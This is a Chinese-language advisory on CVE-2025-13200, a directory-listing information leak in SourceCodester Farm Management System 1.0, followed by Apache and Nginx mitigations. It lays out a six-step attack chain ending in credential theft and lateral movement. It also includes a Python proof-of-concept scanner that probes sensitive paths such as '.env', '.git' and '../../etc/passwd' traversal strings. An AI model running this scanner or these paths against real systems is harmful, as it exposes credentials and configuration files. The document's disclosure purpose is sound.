CVE-2025-13200 SourceCodester农场管理系统目录遍历信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-13200

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Farm Management System 1.0

漏洞概述

CVE-2025-13200是SourceCodester Farm Management System 1.0版本中的一个信息泄露漏洞。该漏洞由于应用程序对目录访问控制不当，导致攻击者可以通过目录遍历或直接访问特定目录路径，获取服务器敏感文件列表信息。攻击者无需任何认证即可利用此漏洞远程发起攻击，成功利用后可获取系统目录结构、配置文件、源代码文件等敏感信息，为进一步攻击提供情报支持。此漏洞已被公开披露并存在可利用的exploit，CVSS评分5.3属于中等严重程度，主要影响系统的机密性。

技术细节

该漏洞存在于SourceCodester Farm Management System 1.0的Web应用程序中，具体为目录列表功能未进行适当的访问控制验证。攻击者可以通过构造特定的HTTP请求，直接访问服务器上的敏感目录路径，如管理后台目录、配置文件目录、数据库配置目录等。服务器在处理这些请求时，返回了目录内容列表而非正确的访问拒绝响应，从而泄露了系统内部结构和文件信息。攻击者利用获取的目录信息，可以进一步识别系统中存在的其他漏洞，如未授权访问的管理接口、可下载的配置文件（包含数据库凭证等敏感信息）、备份文件等。该漏洞的利用无需任何认证凭证，攻击复杂度低，影响范围包括所有未打补丁的1.0版本用户。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标网站使用的技术栈，确认是否为SourceCodester Farm Management System 1.0版本

STEP 2

步骤2：目录探测

使用自动化工具或手动构造HTTP请求探测可能的敏感目录路径，如/admin/、/config/、/includes/等

STEP 3

步骤3：目录列表获取

发现存在目录遍历漏洞的路径后，获取完整的目录列表文件信息，包括文件名、大小、修改时间等

STEP 4

步骤4：敏感文件识别

根据目录列表结果识别敏感文件，如配置文件（config.php、db.php）、备份文件、.env环境变量文件等

STEP 5

步骤5：敏感信息提取

下载或访问识别的敏感文件，提取数据库凭证、API密钥、源代码等敏感信息

STEP 6

步骤6：横向移动

利用获取的凭证信息进一步访问数据库、管理后台或其他系统组件，实现权限提升或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13200 PoC - SourceCodester Farm Management System 1.0 Directory Listing
import requests
import sys

TARGET_URL = "http://target.com/farm-management-system"

# Common sensitive directories to check
SENSITIVE_PATHS = [
    "/admin/",
    "/includes/",
    "/config/",
    "/backup/",
    "/assets/",
    "/images/",
    "/uploads/",
    "/css/",
    "/js/",
    "/lib/",
    "/pages/",
    "/templates/",
    "/db/",
    "/.git/",
    "/.env",
    "../../etc/passwd",
    "..\\..\\windows\\system32\\config\\sam"
]

def check_directory_listing(path):
    """Check if directory listing is enabled for given path"""
    try:
        url = TARGET_URL + path
        response = requests.get(url, timeout=10)
        
        # Check for directory listing indicators
        if response.status_code == 200:
            indicators = ["Index of", "Directory listing", "Parent Directory", "Last modified"]
            for indicator in indicators:
                if indicator in response.text:
                    return True, response.text[:500]
        return False, None
    except requests.RequestException as e:
        return False, str(e)

def main():
    print(f"[*] Scanning {TARGET_URL} for CVE-2025-13200")
    print("=" * 60)
    
    for path in SENSITIVE_PATHS:
        is_vulnerable, content = check_directory_listing(path)
        if is_vulnerable:
            print(f"[+] VULNERABLE: {path}")
            print(f"    Directory listing enabled!")
            print(f"    Preview: {content[:200]}...")
        else:
            print(f"[-] Not vulnerable: {path}")
    
    print("\n[*] Scan complete")

if __name__ == "__main__":
    main()

影响范围

SourceCodester Farm Management System 1.0

防御指南

临时缓解措施

立即在Web服务器配置中禁用目录列表功能。对于Apache服务器，在对应的.htaccess或httpd.conf中添加"Options -Indexes"指令；对于Nginx服务器，添加"autoindex off;"配置。同时检查应用程序代码，移除或限制所有可直接访问敏感目录的接口，并实施基于角色的访问控制策略。在完成永久修复前，建议使用WAF对相关路径进行访问限制和监控。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13200
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13200
3 Details https://www.cvedetails.com/cve/CVE-2025-13200/
4 VulDB https://vuldb.com/cve/CVE-2025-13200
5 Link https://github.com/Shaker-Chen/cve/issues/1
6 Link https://vuldb.com/?ctiid.332498
7 Link https://vuldb.com/?id.332498
8 Link https://vuldb.com/?submit.685615
9 Link https://www.sourcecodester.com/